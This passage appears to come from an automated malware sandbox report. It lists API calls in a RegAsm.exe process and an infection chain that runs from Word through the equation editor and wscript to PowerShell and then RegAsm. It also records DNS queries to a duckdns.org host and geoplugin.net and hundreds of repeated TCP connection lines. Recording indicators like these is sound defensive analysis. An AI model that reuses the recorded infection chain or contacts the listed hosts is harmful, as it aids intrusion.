                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00407877 FindFirstFileW,FindNextFileW,8_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044E8F9 FindFirstFileExA,8_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,8_2_100010F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_10006580 FindFirstFileExA,8_2_10006580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_00407CD2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior

                  Software Vulnerabilities

                  barindex
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h7_2_0025553C
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h7_2_00255548
                  Source: global trafficDNS query: name: archive.org
                  Source: global trafficDNS query: name: dremom2.duckdns.org
                  Source: global trafficDNS query: name: dremom2.duckdns.org
                  Source: global trafficDNS query: name: dremom2.duckdns.org
                  Source: global trafficDNS query: name: geoplugin.net
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 85.239.241.184:80
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 178.237.33.50:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.224.2:443
